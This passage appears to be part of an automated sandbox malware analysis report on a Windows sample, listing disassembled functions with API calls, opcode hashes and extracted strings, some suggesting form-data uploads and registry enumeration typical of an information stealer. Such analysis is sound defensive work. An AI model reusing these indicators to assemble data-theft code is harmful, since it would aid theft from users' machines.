                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProfile
                                                          • String ID: advapi32.dll
                                                          • API String ID: 2104809126-4050573280
                                                          • Opcode ID: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                          • Instruction ID: 6db1735cda00ed3d220bfaf1cacc4b3e5e01bff1461a9ef13bbd23f8b442f0e3
                                                          • Opcode Fuzzy Hash: 47e41008aad65778580e0c35056873463c47f4eed791b1223cc5fbeb135fea17
                                                          • Instruction Fuzzy Hash: 9BF0E9F3D4013126F61025AA5C01ABB7E888B46729F140177FD0CE6281E21E9D8242EA
                                                          Function 0044E224 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                          • GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 485612231-0
                                                          • Opcode ID: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                          • Instruction ID: f015b3b87cbc766378ce5f0d68a15eb43446f93644205f51174f0ce78f182e30
                                                          • Opcode Fuzzy Hash: 5ab3d534c7926ab7bd1f653ef6df7c72235af480dfd0cba9c2c881dd6ec4968b
                                                          • Instruction Fuzzy Hash: 3AE08631100214ABEF112BA2AD0AB5A3B9CBF80355F104065F60896161EBB88850C7DD
                                                          Function 02ED0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02ED0223,?,?), ref: 02ED0E19
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02ED0223,?,?), ref: 02ED0E1E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction ID: 2728ec6266eccd2df74ccad318daa4bcd13064fc6acaeedfbc78d4ad9a9bc59b
                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                          • Instruction Fuzzy Hash: 33D0123114512877DB002AA4DC09BCD7B1CDF05B66F048011FB0DD9080C770954146E5
                                                          Function 00418BA2 Relevance: 1.8, APIs: 1, Instructions: 313COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                          • Instruction ID: 1d70213f864448114667fa93143398f689e43ce09380febb34e55b8e9c3c6d32
                                                          • Opcode Fuzzy Hash: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                          • Instruction Fuzzy Hash: AEC1ECB1A05B009FD724CF29C88166BFBE5FF88314F14892EE5AA83750E774E845CB56
                                                          Function 0044CFE0 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                          • Instruction ID: 373710123005f16d466fbf61102d91235a16be84b9ed3eb2ab6254e0a7e141d7
                                                          • Opcode Fuzzy Hash: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                          • Instruction Fuzzy Hash: B6016D33B001145FBF11CE69EC4595B3796EBC1328B244132F904CB185FB39CC028389
                                                          Function 0045699F Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0044EB6F: RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                          • RtlReAllocateHeap.NTDLL(00000000,00000000,00413871,00000000,00000000,00000000,00413871,00000000,00000000,755AF770,?,0041A136,00001FE6,00003CA7,?,000016E5), ref: 004569FC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                          • Instruction ID: a5a40cd43560794f83e54c6bbfcb227c9197063c5c667a14a31a2b77de81b9f8
                                                          • Opcode Fuzzy Hash: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                          • Instruction Fuzzy Hash: 80F0C8B110011576AB212A279C01B6B276C9FC1B76F56013FFC1497293EE7C9809C29E
                                                          Function 00450330 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                          • Instruction ID: 035a614d3876f6906020b157cdd10206fdefeae5334def747215f66390aa104c
                                                          • Opcode Fuzzy Hash: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                          • Instruction Fuzzy Hash: BBF05939200620A7AB205B728C01B6B3758AF81772B044127FC08DA282DA38DC09C6EE
                                                          Function 0044EB6F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                          • Instruction ID: b54a30de40d39881521df567edad888a5efcf5dcf9e065f2953d68bc5b8e4da5
                                                          • Opcode Fuzzy Hash: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                          • Instruction Fuzzy Hash: 3AE0E5212001A56AFA30A767CC01B6B3A4DFF417B8F010037ED47A62D1DBACEC0285AE
                                                          Function 02F69BED Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02F69C3E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F69000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2f69000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction ID: e78b53b8b946b2197d1a57348711677983769f7f834b410c5d0e939825deba98
                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                          • Instruction Fuzzy Hash: 5D112B79A00208EFDB01DF98C989E99BBF5EF08350F058094FA489B361D371EA50DF80

                                                          Non-executed Functions

                                                          Function 02EDBA83 Relevance: 42.2, APIs: 5, Strings: 18, Instructions: 1922stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$Y[[T$bi${#9${#9$Y=`$Y=`
                                                          • API String ID: 1659193697-3907602706
                                                          • Opcode ID: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                          • Instruction ID: d0c50640287b854dc98303e29e745f74e8bd18d410da6aba018040be517a087a
                                                          • Opcode Fuzzy Hash: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                          • Instruction Fuzzy Hash: 55F21A72D8061A8BDF248F588D556BD7BB0AB0431CF65A52BE505FF390F7708A42CB92
                                                          Function 0041B251 Relevance: 28.9, APIs: 6, Strings: 10, Instructions: 942COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: Content-Disposition: form-data; name="$A@6e$A@6e$Content-Type: attachment/x-object$RY30$SqDe87817huf871793q74$^^4$^^4$ame=$ilen
                                                          • API String ID: 4218353326-1595699696
                                                          • Opcode ID: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
                                                          • Instruction ID: 2d689a8b6144ae040ff6817911910587bd341415a88b77611baba4cffa878017
                                                          • Opcode Fuzzy Hash: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
                                                          • Instruction Fuzzy Hash: EC72A771D442198BDF18CF98D9855FEBBB0EB14314F24056BE915EB360E3788A858BCB
                                                          Function 02F042E7 Relevance: 25.4, APIs: 7, Strings: 7, Instructions: 872registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wsprintfW.USER32 ref: 02F04942
                                                          • RegEnumKeyExW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 02F0498C
                                                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?,00000001), ref: 02F0500C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EnumOpenwsprintf
                                                          • String ID: $jRk$$jRk$?$TT4$TT4$y_B>$y_B>
                                                          • API String ID: 934838074-1833258458
                                                          • Opcode ID: 3b54bece40eef002e0db5d64569429b679c5c83022a00990b2c8552d4bb31e81
                                                          • Instruction ID: 5a628203852a4aec2e543b4c1136e657053a8e23d0e019c6f775b44711b10e35
                                                          • Opcode Fuzzy Hash: 3b54bece40eef002e0db5d64569429b679c5c83022a00990b2c8552d4bb31e81
                                                          • Instruction Fuzzy Hash: 3062E7B1E0021A8BDF24CA989CD46BDBAB1BB54394F145626D715EB2D0D3B48A40FF92
                                                          Function 00434FAC Relevance: 22.0, APIs: 3, Strings: 9, Instructions: 1008COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strncpy
                                                          • String ID: $jRk$$jRk$3Z@$576xed$TT4$TT4$x_B>$y_B>$y_B>
                                                          • API String ID: 2961919466-3812700333
                                                          • Opcode ID: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
                                                          • Instruction ID: c1f0278ec094f6be02d202c53d620e15fc525e7d6860b659e372b79efda81f17
                                                          • Opcode Fuzzy Hash: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
                                                          • Instruction Fuzzy Hash: 3982DBB1D0051A8BDF28DB68C9451BEB670EB5C310F29662BE505EB360D738DE418B9F
                                                          Function 02EDE3B5 Relevance: 20.6, Strings: 15, Instructions: 1822COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$n_v$n_v$u2B$v2B$v2B
                                                          • API String ID: 0-3549259986
                                                          • Opcode ID: a0ad07c5876174a456e6ff089356687033de193354f657ccdd22f267db1287ce
                                                          • Instruction ID: 54f17f4a672923cfd4e7c45fe2917fa1b8e0eb386ed75c200b5acee344018555
                                                          • Opcode Fuzzy Hash: a0ad07c5876174a456e6ff089356687033de193354f657ccdd22f267db1287ce
                                                          • Instruction Fuzzy Hash: 7FE20DB1E802199BDF24CE98C8856BE7B71AB14714F18A557F50BFF390D3709A42CB92
                                                          Function 0041AA49 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 473COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: Content-Disposition: form-data; name="$ &$($:[$SqDe87817huf871793q74
                                                          • API String ID: 4218353326-898291561
                                                          • Opcode ID: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
                                                          • Instruction ID: fda5cd55cfb9f0796932eaeb7ac8b2d4ab06e0c9493bffbe09938a436643aec3
                                                          • Opcode Fuzzy Hash: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
                                                          • Instruction Fuzzy Hash: 7F128DB090560A8BCF18CF58C9901BEBBB1FF54354F24592BE855EB394D7388991CB8B
                                                          Function 02F05213 Relevance: 18.5, APIs: 2, Strings: 8, Instructions: 1008COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strncpy
                                                          • String ID: $jRk$$jRk$TT4$TT4$mE$x_B>$y_B>$y_B>
                                                          • API String ID: 2961919466-2403683918
                                                          • Opcode ID: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                          • Instruction ID: dc2ecfd25276403af2c9dc50eab958ae4cee9600dc500b703a15777aac136b85
                                                          • Opcode Fuzzy Hash: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                          • Instruction Fuzzy Hash: A28208B2E002198BDF24CA98D8D46BDB7B5BF08294F64052BD615EB3D0D374DA90DF92
                                                          Function 0040112C Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 335COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: f3@$x_B>$y_B>$y_B>
                                                          • API String ID: 0-2758273646
                                                          • Opcode ID: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
                                                          • Instruction ID: 769378b0013e5f891025f4b50e79353ec4a26f3ac52f3a61e025b4fcd72a7191
                                                          • Opcode Fuzzy Hash: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
                                                          • Instruction Fuzzy Hash: 2BC1A1756183019BCB2C8A19C99153EBAE5AB85314F14893FF556EB3F0E338D8419B4B
                                                          Function 0043A4FE Relevance: 11.3, APIs: 1, Strings: 5, Instructions: 823COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: Ju^%$Ku^%$Y=`$Y=`$Y=`
                                                          • API String ID: 4218353326-1811093487
                                                          • Opcode ID: cf27e2aad08aa0ad968c1e6dfb0571fb3b005bd4e8b72d189d402ef4653cb86d
                                                          • Instruction ID: 68bed0c00360ed0a45c1e6ce9cbfc25002c960087630870fd3b76e024578c11c
                                                          • Opcode Fuzzy Hash: cf27e2aad08aa0ad968c1e6dfb0571fb3b005bd4e8b72d189d402ef4653cb86d
                                                          • Instruction Fuzzy Hash: D662D3B1D402198BCF24CB98C9856BEBBB0EB18305F24251BD595FB350D33CCA518BAB
                                                          Function 00439535 Relevance: 10.9, Strings: 8, Instructions: 905COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: (lu$)lu$)lu$n_v$n_v$u2B$v2B$v2B
                                                          • API String ID: 4218353326-1100714106
                                                          • Opcode ID: fc83baca781e6038d85ce843f57f52639d84c7305a5e30f3d91329c925e2716a
                                                          • Instruction ID: a2355ce2209b5258348a648dcbfed05c01f212a34098c733ae6d56c92e88b106
                                                          • Opcode Fuzzy Hash: fc83baca781e6038d85ce843f57f52639d84c7305a5e30f3d91329c925e2716a
                                                          • Instruction Fuzzy Hash: 717284B2D001199BCF64CFAC848557EB6B0BB18310F24251BD55AEB351E3B89E91CF9B
                                                          Function 00457B30 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          • Opcode ID: 9df9496146953a9c334645953d65b23cf1161b90a9ddbaf06c4857e78f5672f2
                                                          • Instruction ID: 851cf4d307f2775529c2b2c48624cd02a74d3cb87db6a9e2c754e45b37c83e55
                                                          • Opcode Fuzzy Hash: 9df9496146953a9c334645953d65b23cf1161b90a9ddbaf06c4857e78f5672f2
                                                          • Instruction Fuzzy Hash: C5D23B71E082288FDB65CE24DD407EAB7B5EB44306F1445EBD80DE7241EB78AE898F45
                                                          Function 00428334 Relevance: 9.8, Strings: 7, Instructions: 1067COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $jRk$$jRk$ST4$TT4$q7 C$q7 C$y_B>
                                                          • API String ID: 0-4120928008
                                                          • Opcode ID: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                          • Instruction ID: 5ed2bce57202caa61740e9a0066a193a3aa364e15e010ca0d77f5b321bac14a1
                                                          • Opcode Fuzzy Hash: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                          • Instruction Fuzzy Hash: 6792C670B0A3159BD724DF18E58563EBAE1EB94700FA8891FE5C9CB390D679CC418B4B
                                                          Function 00424C8D Relevance: 7.4, Strings: 5, Instructions: 1174COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleModuleName
                                                          • String ID: T5 S$U5 S$U5 S$]cnq$fS))
                                                          • API String ID: 2106025501-2879408294
                                                          • Opcode ID: d4ef6aecc819cbfd79ed1537f8e605b86188b9f0b6e42f283061d9fbf544773c
                                                          • Instruction ID: dfb0ff48f0b3588d0c8ddc0fc82928454e0cf031636ecd05e75d9b592114eb49
                                                          • Opcode Fuzzy Hash: d4ef6aecc819cbfd79ed1537f8e605b86188b9f0b6e42f283061d9fbf544773c
                                                          • Instruction Fuzzy Hash: B2A271B07097118BD724EF1DE69522EBBE0EB94750FA58D1FE185CB350E638C8819B4B
                                                          Function 02ED2260 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 254sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcessSleep
                                                          • String ID: Ku^%$Ku^%
                                                          • API String ID: 911557368-1067927601
                                                          • Opcode ID: 82cfc510ece84957cbba0257fc153cb2f1f42220bc350d1360029cd4826f0e13
                                                          • Instruction ID: 1d1ceadc221dc7f86350ddd9790caee6ba6f19c410f9e246ba7e8bacb3e454ee
                                                          • Opcode Fuzzy Hash: 82cfc510ece84957cbba0257fc153cb2f1f42220bc350d1360029cd4826f0e13
                                                          • Instruction Fuzzy Hash: 5CA12BB1544B018BCF348F19C590B25B6E1AB45718714E91EEEABCBA62D734E853CF42
                                                          Function 0041EBEB Relevance: 6.8, Strings: 5, Instructions: 537COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (lu$)lu$)lu$n_v$n_v
                                                          • API String ID: 0-3830700584
                                                          • Opcode ID: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
                                                          • Instruction ID: 4a2fd8414ffc0d2b7e824df66967180c6b9bc980e05f2bb9b5fb8abbe135a622
                                                          • Opcode Fuzzy Hash: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
                                                          • Instruction Fuzzy Hash: 1D22B478D0460A9BCF24CF9DC8956FFBBB0EB14304F24052BD515EB351D3789A868B9A
                                                          Function 02F003F5 Relevance: 6.6, Strings: 5, Instructions: 301COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%
                                                          • API String ID: 0-3469696018
                                                          • Opcode ID: 6ec76950be12901a45a75c5ce88806d55f504ea767741fb8e6c205ae61d7ac73
                                                          • Instruction ID: ce17313cc358dd47d3dba6249d04c437ba66505feff6d0c5d931c367862a71c5
                                                          • Opcode Fuzzy Hash: 6ec76950be12901a45a75c5ce88806d55f504ea767741fb8e6c205ae61d7ac73
                                                          • Instruction Fuzzy Hash: 0AB10472D101498BDF24CB58C981BBE7A71AB81344F28552BFB15EB6D0EB34CA40DB87
                                                          Function 02EDAB8F Relevance: 6.5, APIs: 4, Instructions: 475stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,00469144,?,02EDBA31,02EDCC5B,?,?,?), ref: 02EDAEC5
                                                          • lstrcatW.KERNEL32(?,0045FD78,?,?,?,?,?,?,?,?,00469144,?,02EDBA31,02EDCC5B,?,?), ref: 02EDAF29
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcatlstrlen
                                                          • String ID:
                                                          • API String ID: 1475610065-0
                                                          • Opcode ID: ef72a88249dd871b6e6f7590a3c2d473460619251f7bcc7e3a36d31713e60fb7
                                                          • Instruction ID: 0134f6b2f4c30ea9e4cde3742a787be9a9800f3b6559375c829d081d84542430
                                                          • Opcode Fuzzy Hash: ef72a88249dd871b6e6f7590a3c2d473460619251f7bcc7e3a36d31713e60fb7
                                                          • Instruction Fuzzy Hash: C6020972D802198BDF249B58C851BFD7671AB04318F15E93FE41AEB390E3758A43CB96
                                                          Function 0044F244 Relevance: 6.3, APIs: 4, Instructions: 337COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
